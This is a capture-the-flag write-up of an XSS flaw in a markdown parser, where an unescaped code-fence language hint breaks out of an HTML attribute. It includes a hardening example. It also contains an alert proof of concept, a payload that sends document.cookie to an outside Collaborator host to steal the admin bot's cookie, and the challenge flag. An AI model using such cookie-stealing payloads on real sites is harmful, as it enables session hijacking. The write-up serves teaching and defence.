# Markdown Parser

## Challenge Description

I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!

Author: ocean

<http://challs.nusgreyhats.org:33335>

<https://storage.googleapis.com/greyctf-challs/dist-markdown-parser.zip>

***

## Code Analysis

Looking at the site, it seems relatively straightforward: just a markdown parser.

<figure><img src="/files/HVOUJ9hM7DHkOqhlV4qi" alt=""><figcaption></figcaption></figure>

Markdown parsers are known to be vulnerable to XSS when input is not properly sanitized and escaped, since the rendered HTML reflects your input, as shown below.

<figure><img src="/files/n7Bly8WUfx037yEwyU7g" alt=""><figcaption></figcaption></figure>

Looking at the code where the markdown is parsed:

<figure><img src="/files/z0oCfieXnVQacum7rUyK" alt=""><figcaption><p>markdown.js</p></figcaption></figure>

We can see that they check whether a line opens a code block, as indicated by ` ``` `.

If it is a code block, the language is appended onto `htmlOutput`. Note that they also attempt to perform sanitization through the `escapeHtml` function when not inside a code block.

<figure><img src="/files/VfqSwgkdEUTpz2U0ORDS" alt=""><figcaption></figcaption></figure>

The function replaces ampersand, greater-than, less-than, double quotes, and single quotes with their respective HTML entities. However, on line 18, we noticed that the language was appended onto `htmlOutput` without any escaping.
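As an added illustration (not the challenge's `markdown.js`, whose code is only shown in the screenshots above), the snippet below reproduces the bug class in a minimal code-fence handler and places the hardened form beside it: the language hint is both HTML-escaped and restricted to a plain identifier before it lands in the `class` attribute. The names `renderVulnerable`, `renderHardened`, `isSafeLanguage` and `containsRawMarkup` are assumptions of this example, and the sample input is constructed from the payload shape discussed on this page.

```javascript
// Added example, not the challenge's own parser. Function names are assumptions.
const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Allow only a conservative identifier for the language hint (e.g. "js", "c++", "html5").
function isSafeLanguage(lang) {
  return /^[A-Za-z0-9_+#.-]{1,32}$/.test(lang);
}

// Three backticks, built at runtime so the example can live inside a fenced block.
const FENCE = '`'.repeat(3);

// Shared line walker: `onFence` decides how the language hint becomes HTML.
function render(markdown, onFence) {
  let html = '';
  let inCode = false;
  for (const line of markdown.split('\n')) {
    if (line.startsWith(FENCE)) {
      if (!inCode) {
        html += onFence(line.slice(3).trim()); // opening fence carries the language hint
        inCode = true;
      } else {
        html += '</code></pre>\n';
        inCode = false;
      }
      continue;
    }
    // Both variants escape ordinary text and code bodies alike.
    html += escapeHtml(line) + '\n';
  }
  if (inCode) html += '</code></pre>\n';
  return html;
}

// Vulnerable variant: the hint is dropped into a quoted attribute unescaped,
// the same pattern the write-up identifies on line 18 of the challenge parser.
function renderVulnerable(markdown) {
  return render(markdown, (lang) => `<pre><code class="language-${lang}">`);
}

// Hardened variant: reject anything that is not a plain identifier, and escape
// what remains so a quote or angle bracket can never break out of the attribute.
function renderHardened(markdown) {
  return render(markdown, (lang) => {
    if (!isSafeLanguage(lang)) return '<pre><code>';
    return `<pre><code class="language-${escapeHtml(lang)}">`;
  });
}

// Regression check: does the output carry a script tag or event handler once the
// parser's own <pre>/<code> wrappers are removed? Coarse, but enough for a unit test.
function containsRawMarkup(html) {
  const stripped = html.replace(/<\/?(pre|code)(\s[^>]*)?>/g, '');
  return /<script|on\w+\s*=/i.test(stripped);
}

// Constructed sample input: the attribute-breakout shape discussed on this page.
const SAMPLE = FENCE + '"> <script>alert(document.domain)</script>\nconsole.log(1)\n' + FENCE;

console.log('vulnerable leaks markup:', containsRawMarkup(renderVulnerable(SAMPLE)));
console.log('hardened leaks markup:  ', containsRawMarkup(renderHardened(SAMPLE)));
```

Escaping alone already closes this injection, because the value sits inside a double-quoted attribute and `&quot;` cannot end it; the identifier allowlist is added so that class names stay predictable for the syntax highlighter. `containsRawMarkup` is a test helper, not a sanitizer.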

<figure><img src="/files/jRvlcOpIZF859RV88Ogz" alt=""><figcaption></figcaption></figure>

After parsing the markdown, we can then submit the Markdown to the admin bot at the `/feedback` endpoint. Now that we have dissected the application, we can attempt to exploit the potential cross-site scripting that was identified.

***

## Exploit

Firstly, we used `<script>alert(document.domain)</script>` as a proof of concept that we are able to perform XSS.

{% code title="Payload" %}

````javascript
```"> <script>alert(document.domain)</script>
````

{% endcode %}

<figure><img src="/files/U27rLKD7fFKIwHf4VnTD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/YUUw0pmcny20R42XOWQU" alt=""><figcaption></figcaption></figure>

We are able to get the XSS working.

So let's modify our payload to try and steal the admin cookie.

{% code title="Payload" overflow="wrap" %}

````javascript
```"> <script>fetch('http://d9nzvl3vlaa0mvl0ixdml5g4zv5otjh8.oastify.com', {method: 'POST', mode: 'no-cors', body:document.cookie }); </script>
````

{% endcode %}

I used Burp Suite Collaborator to receive the request, and Burp Suite Repeater to send it.

<figure><img src="/files/7UYlmDB1XF1lUyBLLAxz" alt=""><figcaption><p>BurpSuite Repeater Tab</p></figcaption></figure>

After waiting for a bit, I managed to receive the request in Collaborator, and was able to retrieve the flag successfully.

<figure><img src="/files/lvls8IisZjrEDfwOlRuv" alt=""><figcaption><p>BurpSuite Collaborator Tab</p></figcaption></figure>

Flag: grey{m4rkd0wn\_th1s\_fl4g}
